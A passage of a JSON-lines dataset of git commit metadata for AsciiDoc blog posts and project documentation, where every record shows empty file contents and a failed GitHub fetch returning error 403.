2016-08-05-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","message":"Update 2016-08-05-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-08-05-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","new_file":"_posts\/2016-08-05-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3c5292326ac021fe5925622169eff9cb0af91616","subject":"Create How-to-get-your-addon-listed.asciidoc","message":"Create How-to-get-your-addon-listed.asciidoc","repos":"forge\/docs,agoncal\/docs,addonis1990\/docs,addonis1990\/docs,agoncal\/docs,forge\/docs,luiz158\/docs,luiz158\/docs","old_file":"tutorials\/How-to-get-your-addon-listed.asciidoc","new_file":"tutorials\/How-to-get-your-addon-listed.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/addonis1990\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"d3700b24285995327c5e480a2d86f4bca54d66ad","subject":"Update 2016-02-19-Java-Memory-Pic-and-Flags.adoc","message":"Update 2016-02-19-Java-Memory-Pic-and-Flags.adoc","repos":"azubkov\/azubkov.github.io,azubkov\/azubkov.github.io,azubkov\/azubkov.github.io","old_file":"_posts\/2016-02-19-Java-Memory-Pic-and-Flags.adoc","new_file":"_posts\/2016-02-19-Java-Memory-Pic-and-Flags.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/azubkov\/azubkov.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"85f5ded5e82d096f0ef7179ad557afdd02dc11b6","subject":"Update 
2016-01-13-how-to-install-python-on-linux.adoc","message":"Update 2016-01-13-how-to-install-python-on-linux.adoc","repos":"Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io","old_file":"_posts\/2016-01-13-how-to-install-python-on-linux.adoc","new_file":"_posts\/2016-01-13-how-to-install-python-on-linux.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Lh4cKg\/Lh4cKg.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c9eab2d9c89dc1c65a8817b5ee17b63e82e19a60","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/people_i_am_afraid_of.adoc","new_file":"content\/writings\/people_i_am_afraid_of.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"c6a3157fd8391c9ba5428df1fbd3bfeb010ef1bc","subject":"Adds information on RibbonRoutingFilter HTTP Clients","message":"Adds information on RibbonRoutingFilter HTTP Clients\n","repos":"brenuart\/spring-cloud-netflix,bijukunjummen\/spring-cloud-netflix,brenuart\/spring-cloud-netflix,sfat\/spring-cloud-netflix,joshiste\/spring-cloud-netflix,joshiste\/spring-cloud-netflix,elgohr\/spring-cloud-netflix,sfat\/spring-cloud-netflix,shuiky\/spring-cloud-netflix,bijukunjummen\/spring-cloud-netflix,elgohr\/spring-cloud-netflix,joshiste\/spring-cloud-netflix,joshiste\/spring-cloud-netflix,brenuart\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,sfat\/spring-cloud-netflix,bijukunjummen\/spring-cloud-netflix,shuiky\/spring-cloud-netflix,spring-cloud\/spring-cloud-netflix,elgohr\/spring-cloud-netflix,shuiky\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,sfat\/spring-cloud-netflix,spring-cloud\/spring-cloud-netflix,shuiky\/spring-cloud-netflix,joshiste\/spring-cloud-netflix,shuiky\/spring-cloud-netflix,elgohr\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,sfat\/spring-cloud-netflix,brenuart\/spring-cloud-netflix,ryanjbaxter\/spring-cloud-netflix,elgohr\/spring-cloud-netflix,bijukunjummen\/spring-cloud-netflix,bijukunjummen\/spring-cloud-netflix,brenuart\/spring-cloud-netflix","old_file":"docs\/src\/main\/asciidoc\/spring-cloud-netflix.adoc","new_file":"docs\/src\/main\/asciidoc\/spring-cloud-netflix.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sfat\/spring-cloud-netflix.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6d482f47f994e98ea0e507422ed056e3a107d902","subject":"Update 2016-02-26-Just-testings-how-it-works.adoc","message":"Update 2016-02-26-Just-testings-how-it-works.adoc","repos":"Roen00\/roen00.github.io,Roen00\/roen00.github.io,Roen00\/roen00.github.io,Roen00\/roen00.github.io","old_file":"_posts\/2016-02-26-Just-testings-how-it-works.adoc","new_file":"_posts\/2016-02-26-Just-testings-how-it-works.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Roen00\/roen00.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49e2639385ec3cc643609a6cddd3128bb93df259","subject":"Update 2017-05-08-Static-Translations-Bundle.adoc","message":"Update 
2017-05-08-Static-Translations-Bundle.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-08-Static-Translations-Bundle.adoc","new_file":"_posts\/2017-05-08-Static-Translations-Bundle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c9891b1269538ecb1755cecd4d3711e9606a678d","subject":"Update 2016-04-01-Ill-find-you.adoc","message":"Update 2016-04-01-Ill-find-you.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-01-Ill-find-you.adoc","new_file":"_posts\/2016-04-01-Ill-find-you.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"abf8f38a8231fecd309a4f93ce19699424b9513b","subject":"y2b create post $1000 Titanium iPhone Case","message":"y2b create post $1000 Titanium iPhone Case","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-01-15-1000-Titanium-iPhone-Case.adoc","new_file":"_posts\/2016-01-15-1000-Titanium-iPhone-Case.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c1f1814343683d67ffb1f4ba302fb2a2266cacb6","subject":"Update 2016-10-21-1-Treffen-am-23-September.adoc","message":"Update 2016-10-21-1-Treffen-am-23-September.adoc","repos":"creative-coding-bonn\/creative-coding-bonn.github.io,creative-coding-bonn\/creative-coding-bonn.github.io,creative-coding-bonn\/creative-coding-bonn.github.io,creative-coding-bonn\/creative-coding-bonn.github.io","old_file":"_posts\/2016-10-21-1-Treffen-am-23-September.adoc","new_file":"_posts\/2016-10-21-1-Treffen-am-23-September.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/creative-coding-bonn\/creative-coding-bonn.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7412fdad101d1c5a768a7461305ccbdfbba3da4c","subject":"y2b create post iPad 5 \\\/ iPad Mini 2 to feature fingerprint sensor?","message":"y2b create post iPad 5 \\\/ iPad Mini 2 to feature fingerprint sensor?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-10-02-iPad-5--iPad-Mini-2-to-feature-fingerprint-sensor.adoc","new_file":"_posts\/2013-10-02-iPad-5--iPad-Mini-2-to-feature-fingerprint-sensor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e70032f8b3cbf3796f29e573af78695f213e0770","subject":"Doc : Add doc about authentication, optimistic locking and paging","message":"Doc : Add doc about authentication, optimistic locking and 
paging\n","repos":"alv-ch\/jobroom-api,alv-ch\/jobroom-api","old_file":"src\/docs\/asciidoc\/doc.adoc","new_file":"src\/docs\/asciidoc\/doc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alv-ch\/jobroom-api.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"24cbe6fbf78dad5463f7b866eb44a15c13614c4c","subject":"Update 2017-06-01-Open-Street-Map-Knowledge.adoc","message":"Update 2017-06-01-Open-Street-Map-Knowledge.adoc","repos":"porolakka\/hubpress.io,porolakka\/hubpress.io,porolakka\/hubpress.io,porolakka\/hubpress.io","old_file":"_posts\/2017-06-01-Open-Street-Map-Knowledge.adoc","new_file":"_posts\/2017-06-01-Open-Street-Map-Knowledge.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/porolakka\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e38286868c7b7f6f948cda4d4beb13796f3c7909","subject":"Update 2017-06-09-Pepper-Amazon-Rekognition.adoc","message":"Update 2017-06-09-Pepper-Amazon-Rekognition.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-09-Pepper-Amazon-Rekognition.adoc","new_file":"_posts\/2017-06-09-Pepper-Amazon-Rekognition.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6a1bb96c3e34685570d193b55e4ee05ec37b0950","subject":"Update 2016-07-24-OSX-cache-clean.adoc","message":"Update 2016-07-24-OSX-cache-clean.adoc","repos":"cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io","old_file":"_posts\/2016-07-24-OSX-cache-clean.adoc","new_file":"_posts\/2016-07-24-OSX-cache-clean.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cegohub\/cegohub.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ca035a8a1eca382dea630b8b0712b7d09a665e0","subject":"Update 2019-01-31-Your-Blog-title.adoc","message":"Update 2019-01-31-Your-Blog-title.adoc","repos":"nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io,nbourdin\/nbourdin.github.io","old_file":"_posts\/2019-01-31-Your-Blog-title.adoc","new_file":"_posts\/2019-01-31-Your-Blog-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nbourdin\/nbourdin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"22a618f2b637e1d57b1f0b3046b71fc57b3f5e04","subject":"Update 2016-08-03-2016-08-02.adoc","message":"Update 2016-08-03-2016-08-02.adoc","repos":"tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io","old_file":"_posts\/2016-08-03-2016-08-02.adoc","new_file":"_posts\/2016-08-03-2016-08-02.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tamakinkun\/tamakinkun.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"f0fa7fcde1e004710006b8f5250abc0d27e9ac15","subject":"Update 2017-09-21-Dispositiv.adoc","message":"Update 2017-09-21-Dispositiv.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-09-21-Dispositiv.adoc","new_file":"_posts\/2017-09-21-Dispositiv.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8eca37521aad464c2082eb4514a10461215128e8","subject":"Accept CIP2016-01-26-mandatory-match","message":"Accept CIP2016-01-26-mandatory-match\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"cip\/1.accepted\/CIP2016-01-26-mandatory-match.adoc","new_file":"cip\/1.accepted\/CIP2016-01-26-mandatory-match.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opencypher\/openCypher.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8626e0e37a4c36cae475193131afb565c3932c41","subject":"y2b create post Don't Buy A New TV Without Watching This...","message":"y2b create post Don't Buy A New TV Without Watching This...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-06-14-Dont-Buy-A-New-TV-Without-Watching-This.adoc","new_file":"_posts\/2017-06-14-Dont-Buy-A-New-TV-Without-Watching-This.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f7084e0c53ae42916d0e9d72bc7ccd7be7925a59","subject":"Update 2019-02-22-I-T50.adoc","message":"Update 2019-02-22-I-T50.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-22-I-T50.adoc","new_file":"_posts\/2019-02-22-I-T50.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"119a4c8a6cdd8d29e75fb4cab091efa58d057591","subject":"Update 2016-07-16-Quicksort-en-Scala.adoc","message":"Update 2016-07-16-Quicksort-en-Scala.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2016-07-16-Quicksort-en-Scala.adoc","new_file":"_posts\/2016-07-16-Quicksort-en-Scala.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"852cde03dfb17126dbc5462e56a24fafb3481186","subject":"Update 2018-05-07-try-gas-with-slack.adoc","message":"Update 
2018-05-07-try-gas-with-slack.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-07-try-gas-with-slack.adoc","new_file":"_posts\/2018-05-07-try-gas-with-slack.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fbffadd07ccd198fd579f206036bcc899c4f4d42","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f5b4029e17c5c367f984f91ad67ef3606bfc2f38","subject":"Update MacOS_X_Challenge-Response.adoc","message":"Update MacOS_X_Challenge-Response.adoc","repos":"madrat-\/yubico-pam,eworm-de\/yubico-pam,Yubico\/yubico-pam,Yubico\/yubico-pam,eworm-de\/yubico-pam,madrat-\/yubico-pam,eworm-de\/yubico-pam,madrat-\/yubico-pam,Yubico\/yubico-pam","old_file":"doc\/MacOS_X_Challenge-Response.adoc","new_file":"doc\/MacOS_X_Challenge-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/madrat-\/yubico-pam.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"38208deb01ccbfc81b4aa68347c33115317b4e70","subject":"Update 2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","message":"Update 2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","new_file":"_posts\/2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"50974d0a895db37e38285cac4ffbc80b433f720f","subject":"create post The Coolest Laptop You've Never Heard Of...","message":"create post The Coolest Laptop You've Never Heard Of...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-The-Coolest-Laptop-Youve-Never-Heard-Of....adoc","new_file":"_posts\/2018-02-26-The-Coolest-Laptop-Youve-Never-Heard-Of....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b90c68f0f2b6a7f1aaee997353587d3ec69239ca","subject":"Update 2018-02-27-Switch-from-class-to-Python-36-Named-Tuple.adoc","message":"Update 
2018-02-27-Switch-from-class-to-Python-36-Named-Tuple.adoc","repos":"kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io","old_file":"_posts\/2018-02-27-Switch-from-class-to-Python-36-Named-Tuple.adoc","new_file":"_posts\/2018-02-27-Switch-from-class-to-Python-36-Named-Tuple.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kfkelvinng\/kfkelvinng.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9cc3f9f2b70f300d4ad741500f269fa6e58d9c56","subject":"Update 2016-08-31-No-Victory-Over-Hugo.adoc","message":"Update 2016-08-31-No-Victory-Over-Hugo.adoc","repos":"bretonio\/bretonio.github.io,bretonio\/bretonio.github.io,bretonio\/bretonio.github.io,bretonio\/bretonio.github.io","old_file":"_posts\/2016-08-31-No-Victory-Over-Hugo.adoc","new_file":"_posts\/2016-08-31-No-Victory-Over-Hugo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bretonio\/bretonio.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fdd000a3ef01c308895743b2e624f9db11c95990","subject":"Update 2018-01-29-Artifactory-Research.adoc","message":"Update 2018-01-29-Artifactory-Research.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2018-01-29-Artifactory-Research.adoc","new_file":"_posts\/2018-01-29-Artifactory-Research.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa028965cb42a4850cd826da9d66a1224688f8b3","subject":"Update 2015-12-13-11-10-Bitmask-usage-Part-2.adoc","message":"Update 2015-12-13-11-10-Bitmask-usage-Part-2.adoc","repos":"never-ask-never-know\/never-ask-never-know.github.io,never-ask-never-know\/never-ask-never-know.github.io,never-ask-never-know\/never-ask-never-know.github.io","old_file":"_posts\/2015-12-13-11-10-Bitmask-usage-Part-2.adoc","new_file":"_posts\/2015-12-13-11-10-Bitmask-usage-Part-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/never-ask-never-know\/never-ask-never-know.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e943a0bfbdb698df7517b1fa9aa3f9fb0c01b7c4","subject":"Update 2016-06-24-mintia-and-frisk-by-arduino.adoc","message":"Update 2016-06-24-mintia-and-frisk-by-arduino.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-24-mintia-and-frisk-by-arduino.adoc","new_file":"_posts\/2016-06-24-mintia-and-frisk-by-arduino.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"63d9c9a69653272a9c3cda0062dff8c23edd0d05","subject":"Update 2016-03-28-O-M-G-Its-Web-M-I-D-I-A-P-I.adoc","message":"Update 
2016-03-28-O-M-G-Its-Web-M-I-D-I-A-P-I.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2016-03-28-O-M-G-Its-Web-M-I-D-I-A-P-I.adoc","new_file":"_posts\/2016-03-28-O-M-G-Its-Web-M-I-D-I-A-P-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"42cc410fe1651aee8e3415c578cc17cdb2c84133","subject":"Add new webinar article","message":"Add new webinar article\n","repos":"stuartwdouglas\/wildfly.org,ctomc\/wildfly.org,stuartwdouglas\/wildfly.org,luck3y\/wildfly.org,ctomc\/wildfly.org,ctomc\/wildfly.org,ctomc\/wildfly.org,luck3y\/wildfly.org,adrianoschmidt\/wildfly.org,adrianoschmidt\/wildfly.org,rhusar\/wildfly.org,luck3y\/wildfly.org,stuartwdouglas\/wildfly.org,adrianoschmidt\/wildfly.org,luck3y\/wildfly.org,adrianoschmidt\/wildfly.org,rhusar\/wildfly.org,rhusar\/wildfly.org,rhusar\/wildfly.org,stuartwdouglas\/wildfly.org","old_file":"news\/2013-11-21-WildFly-8-Webinar.adoc","new_file":"news\/2013-11-21-WildFly-8-Webinar.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rhusar\/wildfly.org.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"26569507f7f0e97a3c072b6ae83f6bd0912b6284","subject":"Update 2016-02-05-Hello.adoc","message":"Update 2016-02-05-Hello.adoc","repos":"errorval\/blog,errorval\/blog,errorval\/blog","old_file":"_posts\/2016-02-05-Hello.adoc","new_file":"_posts\/2016-02-05-Hello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/errorval\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"396ade716e72b5dfa5659940230830e69b2cf66c","subject":"Update 2016-07-20-vimer.adoc","message":"Update 2016-07-20-vimer.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-20-vimer.adoc","new_file":"_posts\/2016-07-20-vimer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0836207af90f484920d06fedc0d60e8ecee5cce5","subject":"Update 2018-10-10-Python-A-W-S-Lambda.adoc","message":"Update 2018-10-10-Python-A-W-S-Lambda.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-10-Python-A-W-S-Lambda.adoc","new_file":"_posts\/2018-10-10-Python-A-W-S-Lambda.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"930cad97ebd9b9622c28c1ca1c1a846c9131839c","subject":"y2b create post Black Ops 2 GIVEAWAY UPDATE!","message":"y2b create post Black Ops 2 GIVEAWAY 
UPDATE!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-12-02-Black-Ops-2-GIVEAWAY-UPDATE.adoc","new_file":"_posts\/2012-12-02-Black-Ops-2-GIVEAWAY-UPDATE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b7576796e7601af169fdd0f1c4109ca7861dd6de","subject":"Update 2016-07-20-Introduction-to-Programming.adoc","message":"Update 2016-07-20-Introduction-to-Programming.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-07-20-Introduction-to-Programming.adoc","new_file":"_posts\/2016-07-20-Introduction-to-Programming.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5118c3fd3f802fca09f1bb2e29389ef3e569b8a5","subject":"Update 2016-11-19-CSAA.adoc","message":"Update 2016-11-19-CSAA.adoc","repos":"chackomathew\/blog,chackomathew\/blog,chackomathew\/blog,chackomathew\/blog","old_file":"_posts\/2016-11-19-CSAA.adoc","new_file":"_posts\/2016-11-19-CSAA.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chackomathew\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4fc3772c1af3050c23e8f073e7cc7e65fd2b669b","subject":"Update 2019-01-31-Test.adoc","message":"Update 2019-01-31-Test.adoc","repos":"elinep\/blog,elinep\/blog,elinep\/blog,elinep\/blog","old_file":"_posts\/2019-01-31-Test.adoc","new_file":"_posts\/2019-01-31-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/elinep\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"18bb2986dfb2dc14cf4d5fcb6c779ec5c0f5aa1a","subject":"Update 2017-10-18-Docker-Commands.adoc","message":"Update 2017-10-18-Docker-Commands.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-10-18-Docker-Commands.adoc","new_file":"_posts\/2017-10-18-Docker-Commands.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2103ad791dbb75c2393f9a4add5901bb18cfdcbe","subject":"Update 2018-05-28-Swift-Firestore.adoc","message":"Update 